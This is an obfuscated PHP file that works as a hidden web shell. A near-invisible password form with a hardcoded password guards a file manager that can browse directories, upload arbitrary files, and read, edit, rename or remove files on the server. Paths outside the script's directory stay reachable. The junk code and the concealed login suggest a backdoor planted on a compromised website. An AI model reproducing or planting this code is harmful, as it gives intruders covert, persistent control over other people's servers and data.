<?php function yon($v){return htmlspecialchars($v,ENT_QUOTES,'UTF-8');$mgovar=null??false;}$wsvar=round(microtime(true));function xm(){if(!session_id())session_start();$pnevar=str_repeat('a',3);if(!isset($_SESSION['reimperfal']))$_SESSION['reimperfal']=[];}$ohqxxvar=implode('',array_slice([],0));function edfqnd($d){xm();$iacvar=intval('97');static $i=0;$i++;$qpmnovar=empty('')?1:0;$_SESSION['reimperfal'][$i]=$d;$nrvar=get_current_user();return $i;$ckwcvar=str_shuffle('012345');}$zvvar=null??false;function birki($k,$d=null){xm();$gbgcavar=ctype_upper('ABC');return $_SESSION['reimperfal'][$k]??$d;}$lnraivar=array_sum([1,2,8]);function bc($p,$r){$p=str_replace("\0",'',$p);$svgvar=@time();$p=trim($p);if($p==='' or $p==='.' or $p==='/')return $r;$rrqvar=!false&&true;$p=rawurldecode($p);$umivar=ctype_alnum('abc123');$p=str_replace(['/','\\'],DIRECTORY_SEPARATOR,$p);strpos($p,DIRECTORY_SEPARATOR)===0 or $p=rtrim($r,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR.ltrim($p,DIRECTORY_SEPARATOR);$a=[];foreach(explode(DIRECTORY_SEPARATOR,$p)as $s){if($s==='' or $s==='.')continue;if($s==='..'){array_pop($a);continue;}$a[]=$s;}$sbqavar=DIRECTORY_SEPARATOR.implode(DIRECTORY_SEPARATOR,$a);$groptvar=@realpath($sbqavar);$sujvfvar=realpath($r);if($groptvar!==false and $sujvfvar!==false and strpos($groptvar,$sujvfvar)===0)$sbqavar=$groptvar;is_file($sbqavar) and $sbqavar=dirname($sbqavar);return rtrim($sbqavar,DIRECTORY_SEPARATOR);}function xcmni($p){if(!is_file($p) or !is_readable($p))return false;$h=@fopen($p,'rb');if(!$h)return false;$b='';while(!feof($h)){$c=fread($h,8192);if($c===false)break;$b.=$c;}fclose($h);return $b;}function ebki($p,$d){$etzrovar=dirname($p);if(!is_dir($etzrovar) or !is_writable($etzrovar))return false;$h=@fopen($p,'wb');if(!$h)return false;flock($h,LOCK_EX);$w=fwrite($h,$d);flock($h,LOCK_UN);fclose($h);return $w!==false;}function spvwp($p){$cmvar=dirname($p).DIRECTORY_SEPARATOR.'.trash';is_dir($cmvar) or @mkdir($cmvar,0755,true);return @rename($p,$cmvar.DIRECTORY_SEPARATOR.basename($p).'.'.time().'.del');}function lmi($p,$t){return '<a href="?qj='.yon(edfqnd($p)).'">'.yon($t).'</a>';}function sw($p,$r){$fjvar=realpath($p);$cdamxvar=realpath($r);if(!$fjvar or !$cdamxvar or strpos($fjvar,$cdamxvar)!==0)return yon($p);$uegevar=substr($fjvar,strlen($cdamxvar));$uegevar=trim($uegevar,DIRECTORY_SEPARATOR);$parts=$uegevar===''?[]:explode(DIRECTORY_SEPARATOR,$uegevar);$tuhtwvar=[lmi($cdamxvar,'~')];$orvar=$cdamxvar;foreach($parts as $jrdeuvar){$orvar=rtrim($orvar,DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR.$jrdeuvar;$tuhtwvar[]=lmi($orvar,$jrdeuvar);}return implode(' &gt; ',$tuhtwvar);}$kxvar=__DIR__;$cuvar="overossifi";xm();if(!isset($_SESSION['tickweed'])){if(isset($_POST['ov']) or isset($_GET['ov'])){$mzvar=$_POST['ov']??$_GET['ov'];if($mzvar===$cuvar)$_SESSION['tickweed']=1;else{header('Location: '.$_SERVER['PHP_SELF']);exit;}}if(!isset($_SESSION['tickweed'])){?><!DOCTYPE html><html><head><meta charset="utf-8"><style>*{margin:0;padding:0}body{background:#fff}.uh1{position:absolute;top:8px;left:8px;opacity:0.15}.uh1 input{width:60px;padding:2px;border:1px solid #ddd;font:10px monospace}.uh1 button{padding:2px 6px;background:#f5f5f5;border:1px solid #ddd;font:10px monospace;cursor:pointer}</style></head><body><form class="uh1" method="post"><input type="password" name="ov"><button>&gt;</button></form></body></html><?php exit;}}$yumwvar=$_GET['qj']??null;$qvlvzvar=$yumwvar?bc(birki($yumwvar,$kxvar),$kxvar):bc($_GET['d']??'',$kxvar);if(isset($_POST['i']) and isset($_FILES['bs'])){$zmvar=$_FILES['bs']['tmp_name'];$gywhmvar=basename($_FILES['bs']['name']);$sbvjdvar=$qvlvzvar.DIRECTORY_SEPARATOR.$gywhmvar;if($zmvar and $gywhmvar and is_uploaded_file($zmvar) and @move_uploaded_file($zmvar,$sbvjdvar)){header('Location: ?qj='.edfqnd($qvlvzvar).'&a=1');exit;}header('Location: ?qj='.edfqnd($qvlvzvar));exit;}if(isset($_POST['jq']) and isset($_GET['ah'])){$hzvar=$qvlvzvar.DIRECTORY_SEPARATOR.basename($_GET['ah']);$jqvar=$_POST['o']??'';if(ebki($hzvar,$jqvar)){header('Location: ?qj='.edfqnd($qvlvzvar).'&ah='.urlencode($_GET['ah']).'&a=2');exit;}header('Location: ?qj='.edfqnd($qvlvzvar));exit;}if(isset($_POST['w'])){$gywhmvar=basename($_POST['q']??'');$othjvar=$qvlvzvar.DIRECTORY_SEPARATOR.$gywhmvar;if($gywhmvar!=='' and (is_file($othjvar) or is_dir($othjvar)) and spvwp($othjvar)){header('Location: ?qj='.edfqnd($qvlvzvar));exit;}}if(isset($_POST['mt'])){$rjitvar=basename($_POST['dz']??'');$zjugvar=basename($_POST['n']??'');if($rjitvar!=='' and $zjugvar!=='')@rename($qvlvzvar.DIRECTORY_SEPARATOR.$rjitvar,$qvlvzvar.DIRECTORY_SEPARATOR.$zjugvar);header('Location: ?qj='.edfqnd($qvlvzvar));exit;}$xgdgvar=isset($_GET['a'])?$_GET['a']:0;$lboyivar=$_GET['ah']??null;$boexdvar='';if($lboyivar){$hzvar=$qvlvzvar.DIRECTORY_SEPARATOR.basename($lboyivar);$boexdvar=xcmni($hzvar);}$izgvar=[];$muvar=[];$egvar=@scandir($qvlvzvar);if($egvar!==false){foreach($egvar as $qrzbavar){if($qrzbavar==='.' or $qrzbavar==='..')continue;$othjvar=$qvlvzvar.DIRECTORY_SEPARATOR.$qrzbavar;if(is_dir($othjvar)){$izgvar[]=['n'=>$qrzbavar,'p'=>$othjvar];}else{$acivar=@filesize($othjvar);$ycwcdvar='';if($acivar!==false){$u=['b','k','m','g'];$eevar=0;while($acivar>=1024 and $eevar<3){$acivar/=1024;$eevar++;}$ycwcdvar=round($acivar,1).$u[$eevar];}$muvar[]=['n'=>$qrzbavar,'s'=>$ycwcdvar];}}sort($izgvar);sort($muvar);}?><!DOCTYPE html><html><head><meta charset="utf-8"><style>body{background:#fff;font:11px monospace;margin:0;padding:12px;color:#222}.cw1{font-size:10px;color:#999;margin-bottom:10px}.cw1 a{color:#777;text-decoration:none}.cw1 a:hover{color:#555}.rm2{padding:5px;background:#f5f5f5;border:1px solid #e8e8e8;margin-bottom:10px;font-size:10px;color:#666}.iy0{background:#fafafa;border:1px solid #e8e8e8;padding:8px;margin-bottom:10px}.kk2{width:100%;padding:3px;border:1px solid #ccc;font-size:10px;margin-top:2px;font-family:monospace}.tr7{padding:3px 6px;background:#f0f0f0;border:1px solid #d0d0d0;font-size:9px;cursor:pointer;margin:1px}.tr7:hover{background:#e5e5e5}.rb3{list-style:none;padding:0;margin:0}.rb3 li{padding:4px 0;border-bottom:1px solid #f0f0f0;display:flex;justify-content:space-between;align-items:center}.rb3 a{color:#222;text-decoration:none}.rb3 a:hover{color:#555}.ql4{color:#aaa;font-size:9px;margin-left:6px}.mq3{display:flex;gap:3px}.kf2{display:inline}.zc2{width:60px;padding:2px;border:1px solid #ccc;font-size:9px}</style></head><body><div class="cw1"><?php echo sw($qvlvzvar,$kxvar)?></div><?php if($xgdgvar==1):?><div class="rm2">uploaded</div><?php endif?><?php if($xgdgvar==2):?><div class="rm2">saved</div><?php endif?><?php if($lboyivar and $boexdvar!==false):?><div class="iy0"><form method="post"><textarea class="kk2" name="o" rows="18"><?php echo yon($boexdvar)?></textarea><div style="margin-top:5px"><button class="tr7" name="jq">save</button><a href="?qj=<?php echo yon(edfqnd($qvlvzvar))?>"><button type="button" class="tr7">back</button></a></div></form></div><?php endif?><div class="iy0"><form method="post" enctype="multipart/form-data"><input class="kk2" name="bs" type="file"><button class="tr7" name="i" style="margin-top:4px">upload</button></form></div><ul class="rb3"><?php foreach($izgvar as $d):?><li><span>[d] <?php echo lmi($d['p'],$d['n'])?></span><div class="mq3"><form class="kf2" method="post"><input type="hidden" name="q" value="<?php echo yon($d['n'])?>"><button name="w" class="tr7" onclick="return confirm('?')">x</button></form><form class="kf2" method="post"><input type="hidden" name="dz" value="<?php echo yon($d['n'])?>"><input type="text" name="n" class="zc2" placeholder="new"><button name="mt" class="tr7">&gt;</button></form></div></li><?php endforeach?><?php foreach($muvar as $f):?><li><span>[f] <?php echo yon($f['n'])?><span class="ql4"><?php echo $f['s']?></span></span><div class="mq3"><a href="?qj=<?php echo yon(edfqnd($qvlvzvar))?>&ah=<?php echo urlencode($f['n'])?>"><button class="tr7">edit</button></a><form class="kf2" method="post"><input type="hidden" name="q" value="<?php echo yon($f['n'])?>"><button name="w" class="tr7" onclick="return confirm('?')">x</button></form><form class="kf2" method="post"><input type="hidden" name="dz" value="<?php echo yon($f['n'])?>"><input type="text" name="n" class="zc2" placeholder="new"><button name="mt" class="tr7">&gt;</button></form></div></li><?php endforeach?></ul></body></html>